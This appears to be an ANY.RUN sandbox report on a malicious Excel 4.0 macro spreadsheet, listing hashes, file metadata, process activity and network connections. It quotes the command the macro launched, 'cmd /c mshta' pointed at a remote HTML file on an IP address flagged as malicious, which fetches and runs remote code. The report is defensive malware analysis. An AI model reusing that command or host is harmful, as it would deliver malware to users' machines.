File name:

10027860264845636552.xls

Full analysis: https://app.any.run/tasks/010c719a-b53a-407b-a395-7c9ce385b556
Verdict: Malicious activity
Analysis date: October 03, 2025, 17:19:06
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
macros40
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:12:32 2022, Last Saved Time/Date: Fri Jan 28 17:08:40 2022, Security: 0
MD5:

0E106000B2EF3603477CB460F2FC1751

SHA1:

7C0BD61A7069CC04D4A0AB02B96D9C4003BE0F6D

SHA256:

178CEAB4EA6816FB9D09C729B2A0D6A06BB786452D4178D49BD0A0DEE3F98359

SSDEEP:

1536:u8rk3hbdlylKsgqopeJBWhZFGkE+cL2NdAE6yHBEL70drpFk0GX/s2C6ORQYDBhv:ugk3hbdlylKsgqopeJBWhZFGkE+cL2ND

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 7812)

    • Microsoft Office executes commands via PowerShell or Cmd

      • EXCEL.EXE (PID: 7812)

    • Unusual execution from MS Office

      • EXCEL.EXE (PID: 7812)

  • SUSPICIOUS

    No suspicious indicators.

  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 2288)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 2288)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: xXx
LastModifiedBy: xXx
Software: Microsoft Excel
CreateDate: 2022:01:27 23:12:32
ModifyDate: 2022:01:28 17:08:40
Security: None
CodePage: Windows Cyrillic
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Protect
  • Sheet1
  • LINKO
HeadingPairs:
  • Worksheets
  • 2
  • Excel 4.0 Macros
  • 1
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
176
Monitored processes
5
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe cmd.exe no specs conhost.exe no specs mshta.exe slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2288mshta http://91.240.118.172/cc/vv/fe.htmlC:\Windows\System32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
5244CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.htmlC:\Windows\System32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
7252\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7812"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" C:\Users\admin\Desktop\10027860264845636552.xlsC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\combase.dll
9048C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
7 529
Read events
7 288
Write events
223
Delete events
18

Modification events

(PID) Process:(7812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\7812
Operation:writeName:0
Value:
0B0E10B77B1D4EA31A4F4CB8705C241BF7647D23004695FCBFD69D918DEE016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511843DD2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(7812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(7812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(7812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(7812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(7812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(7812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
(PID) Process:(7812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ko-kr
Value:
2
(PID) Process:(7812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:pt-br
Value:
2
(PID) Process:(7812) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ru-ru
Value:
2
Executable files
1
Suspicious files
13
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
7812EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\10027860264845636552.xls.LNKbinary
MD5:C0A2A4455F624CB41FE8CD781054E9DB
SHA256:39AAA4FF2FF7E6856B306BD7B153644A4338B4F8E544BB83BEE7DDB7C634B558
7812EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N6WJCIJIWLR9BT6BO6TV.tempbinary
MD5:4FCB2A3EE025E4A10D21E1B154873FE2
SHA256:90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
7812EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-msbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
7812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:E44842AC52A0E4037F9E532E1B31B384
SHA256:4301E97E55AFB0F0A330391ECA68681087B7D704E92F77897B0E51E95E3CA1C8
7812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbresbinary
MD5:B68CF282A6D68D0BC36BA361F9923544
SHA256:30FE084523CE83E06CDD8903A7CD915981AB196ACA2AA794ADC83DBC6F6BF838
7812EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z0R938DEH2BNLIL68QLN.tempbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
7812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:8F16451F544834818E9F5C2CE7E6013B
SHA256:0358AED27E9B89248EFE5E2905AA890C81A0DACEECB39E1F1C229EAA91199913
7812EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms~RF174b8f.TMPbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
7812EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\85F1DAA6-5422-4CDD-83A9-F46454A3B3E7xml
MD5:5D8B03383CEB9AF8CCF3505464E850E0
SHA256:E6897A60DD466B3813A9A2618F426F6C4E51B482CCE61C8F5EC1E4DD98E7F1A4
7812EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:ED94DED561F229809314C4C45407438C
SHA256:68FB05840DEB6766889FBB7FCBFA63E8DEBC9CA5F2B5F646619BD09F7D324787
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
37
DNS requests
19
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1048
svchost.exe
GET
200
172.66.2.5:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
1048
svchost.exe
GET
200
172.66.2.5:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
2404
backgroundTaskHost.exe
GET
200
172.66.2.5:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
US
binary
313 b
whitelisted
1444
backgroundTaskHost.exe
GET
200
172.66.2.5:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
US
binary
471 b
whitelisted
7812
EXCEL.EXE
GET
200
172.66.2.5:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
US
binary
471 b
whitelisted
1560
backgroundTaskHost.exe
GET
200
172.66.2.5:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
US
binary
471 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
3432
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6016
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5224
SearchApp.exe
104.84.152.33:443
www.bing.com
Akamai International B.V.
SE
whitelisted
4
System
192.168.100.255:138
whitelisted
7812
EXCEL.EXE
52.109.28.46:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
7812
EXCEL.EXE
52.123.128.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2288
mshta.exe
91.240.118.172:80
Chang Way Technologies Co. Limited
HK
malicious
7812
EXCEL.EXE
52.111.240.11:443
messaging.lifecycle.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
SG
whitelisted
1048
svchost.exe
40.126.31.3:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 51.124.78.146
whitelisted
www.bing.com
  • 104.84.152.33
  • 95.101.142.162
  • 104.84.152.42
  • 104.84.152.19
  • 104.84.152.25
  • 104.84.152.32
  • 104.84.152.26
  • 104.84.152.17
  • 104.84.152.18
whitelisted
google.com
  • 172.217.18.14
whitelisted
officeclient.microsoft.com
  • 52.109.28.46
whitelisted
ecs.office.com
  • 52.123.128.14
  • 52.123.129.14
whitelisted
messaging.lifecycle.office.com
  • 52.111.240.11
whitelisted
login.live.com
  • 40.126.31.3
  • 40.126.31.69
  • 40.126.31.73
  • 20.190.159.73
  • 40.126.31.131
  • 40.126.31.71
  • 40.126.31.2
  • 40.126.31.1
whitelisted
ocsp.digicert.com
  • 172.66.2.5
  • 162.159.142.9
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted

Threats

PID
Process
Class
Message
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
10027860264845636552.xls